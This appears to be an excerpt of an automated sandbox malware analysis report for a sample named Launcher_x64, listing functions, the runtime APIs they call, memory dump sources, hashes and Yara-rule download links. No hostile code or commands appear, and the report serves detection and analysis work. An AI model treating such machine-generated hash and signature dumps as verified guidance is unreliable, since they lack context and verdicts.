                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2040435927-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b2806f2c04466e296f1c9ed7b428307fa531ff5e478aa03248aac30c30efc4ef
                                                                                                                                                                                                                                                                                        • Instruction ID: 9089ab254ef06a33ee206fd136aa99a1709e548ff1c5927491d4f9221feaf509
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2806f2c04466e296f1c9ed7b428307fa531ff5e478aa03248aac30c30efc4ef
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76517EB260020ABBEB205F90EC45FEB7FAAEF44754F194428F955E6190DB74DC908BB0
                                                                                                                                                                                                                                                                                        Function 00D26032 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _strrchr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c3ed0d376608a570b3b521b077c8efc077dfbec983f27d761b9b7f2e2db3b283
                                                                                                                                                                                                                                                                                        • Instruction ID: 65ebb62169b0d1470ed381ec3e6d5d8fc2896633500cbe8e1eb3ccf3e30ec3b5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3ed0d376608a570b3b521b077c8efc077dfbec983f27d761b9b7f2e2db3b283
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9B15972A00375DFDB12CF68EC81BAE7FA5EF65318F284155E944AB282D274E901C7B4
                                                                                                                                                                                                                                                                                        Function 00D17940 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00D17977
                                                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00D1797F
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00D17A08
                                                                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00D17A33
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00D17A88
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                        • Opcode ID: 71568003e4e51a1dd5a26318f109360a913ae8bb0b8c2c17d129ee6b53c3ce2b
                                                                                                                                                                                                                                                                                        • Instruction ID: dafaad03d73ca9af5bbd0b93b0f7913fd6c3df624b2423d65a8dabfb07e0cdde
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71568003e4e51a1dd5a26318f109360a913ae8bb0b8c2c17d129ee6b53c3ce2b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F41E434A04218ABCF11DF68E885ADE7BB5EF45324F188055E8199B362CB319E95CFB0
                                                                                                                                                                                                                                                                                        Function 00D240F9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,BB40E64E,?,00D24208,00D03E32,?,00000000,?), ref: 00D241BA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                                        • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                                        • Opcode ID: e1b2a30326aca85056b474640c2694a1a7fb7e4afb5108da6d0e2efb620827e9
                                                                                                                                                                                                                                                                                        • Instruction ID: 085cc1d4ec07c4ecb6de441a293fa9104b3fba6893152b87d4fd31ec95b4c2e9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e1b2a30326aca85056b474640c2694a1a7fb7e4afb5108da6d0e2efb620827e9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9721D235A01331ABD7229B65FC45A5A375ADF717A8F290220FD15E7390E630EE60CAB0
                                                                                                                                                                                                                                                                                        Function 00D16CBB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D16CC1
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00D16CCF
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00D16CE0
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                                                                        • Opcode ID: ce9f8459bd8c5007804482157522f1dcf2f4176c8c87f6823be2acd2fb4f4b14
                                                                                                                                                                                                                                                                                        • Instruction ID: e074455a983fb0cb76c8cee27ac77675357b8b714d60a76fa3e4ed5c5b367de7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce9f8459bd8c5007804482157522f1dcf2f4176c8c87f6823be2acd2fb4f4b14
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8D0C77E6953205F83105FB57C0DC553EA5EB057117060466F845D3350D6B418558FB2
                                                                                                                                                                                                                                                                                        Function 00D2C0BA Relevance: 9.3, APIs: 6, Instructions: 292COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: a3bcefb32fa0f90019a5f1b4e91887614bb0b7ea968d2a634385c50a3acde6b2
                                                                                                                                                                                                                                                                                        • Instruction ID: 265f53bda9a63c6fb997e1fdde1c68571ed5ce20514bcffd4074831ae4e3f712
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3bcefb32fa0f90019a5f1b4e91887614bb0b7ea968d2a634385c50a3acde6b2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6B1F270A14369AFDB11DF98E841BBD7BB1BF6A308F185158E80197392C770AD42CB75
                                                                                                                                                                                                                                                                                        Function 00D21FAE Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00D21FA5,00D17361,00D16681), ref: 00D21FBC
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D21FCA
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D21FE3
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,00D21FA5,00D17361,00D16681), ref: 00D22035
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ed49ea4d891cc915d607d0cbdecba202cac6a773dbb729e1c6627eedceded169
                                                                                                                                                                                                                                                                                        • Instruction ID: 9172175d43b620fb54452a59cb75eadc4942d9008b64405bed5804baea7c9068
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ed49ea4d891cc915d607d0cbdecba202cac6a773dbb729e1c6627eedceded169
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C201B93A2063317EF6252F75BD459363A55DB7577C7340229F630891E2EFA24D01E970
                                                                                                                                                                                                                                                                                        Function 00D22826 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 00D22945
                                                                                                                                                                                                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 00D22BBE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                        • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                                                        • Opcode ID: ded4d7c9d5786f7a7a8b3e7d90eb16cac952cb772b27c3731f63af38aff9fff2
                                                                                                                                                                                                                                                                                        • Instruction ID: 099f1a983bead430db8d892cac098312dab5aeb4eee53b7df2bc5f6ba609434e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ded4d7c9d5786f7a7a8b3e7d90eb16cac952cb772b27c3731f63af38aff9fff2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CEB16831800229AFCF25DFA4E8819BEB7B5FF68318F58415AF8116B216C735DA51CBB1
                                                                                                                                                                                                                                                                                        Function 00D1CA3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00D33374,000000FF,?,00D1CAFD,00D1C9E4,?,00D1CB99,00000000), ref: 00D1CA71
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,00D33374,000000FF,?,00D1CAFD,00D1C9E4,?,00D1CB99,00000000), ref: 00D1CA83
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,00D33374,000000FF,?,00D1CAFD,00D1C9E4,?,00D1CB99,00000000), ref: 00D1CAA5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                        • Opcode ID: 2ec70da9652abb6bdd633b8c01381a857fefd2f6d2565286116293291a31fba1
                                                                                                                                                                                                                                                                                        • Instruction ID: e5d7c1af655b16d56e28a94e1cb4a9addef38e0bc111745f8a6133cc937802e8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ec70da9652abb6bdd633b8c01381a857fefd2f6d2565286116293291a31fba1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07016735654719AFDB11DF54EC09BAEBBB9FF04714F044525E815E2290DB74A900CE70
                                                                                                                                                                                                                                                                                        Function 00D248CD Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D24952
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D24A1B
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D24A82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D231C1: HeapAlloc.KERNEL32(00000000,?,?,?,00D122A9,?,?,00D03E32,00001000,?,00D03D7A), ref: 00D231F3
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D24A95
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D24AA2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1096550386-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8ea5535b607ae4ce42591fa7d74c569b40dff02ef0d70064d1e17c2a100187b1
                                                                                                                                                                                                                                                                                        • Instruction ID: 522ea74b8b8b92e257baff6af0a9a0c4aa5246b3de6ef5b88db5fe28b39ccf13
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ea5535b607ae4ce42591fa7d74c569b40dff02ef0d70064d1e17c2a100187b1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E851DD72640226BFEF219FA0EC81EBB7BA9EFA471CB194528FD04D6141EB34DD508674
                                                                                                                                                                                                                                                                                        Function 00D01890 Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseFileHandleSize
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3849164406-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 42be21327a0a5c74ac7ec5dfa785c1521b9d48e6f2418f16775b72bb53d3b26d
                                                                                                                                                                                                                                                                                        • Instruction ID: 70404eaed23b885386260762f211daf3b616366ed547e8b94eb05bee4214a340
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42be21327a0a5c74ac7ec5dfa785c1521b9d48e6f2418f16775b72bb53d3b26d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C719EB4D05248CFDB00EFA8D58879DBBF0BF48304F14852AE899AB391D734A945CF62
                                                                                                                                                                                                                                                                                        Function 00D15C7F Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32(?,?,00D15C5C,?,00000000,?,00D0B93C,?,?,00D0D94E), ref: 00D15C93
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,00D15C5C,?,00000000,?,00D0B93C,?,?,00D0D94E), ref: 00D15CB2
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00D15C5C,?,00000000,?,00D0B93C,?,?,00D0D94E), ref: 00D15CE0
                                                                                                                                                                                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00D15C5C,?,00000000,?,00D0B93C,?,?,00D0D94E), ref: 00D15D3B
                                                                                                                                                                                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00D15C5C,?,00000000,?,00D0B93C,?,?,00D0D94E), ref: 00D15D52
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
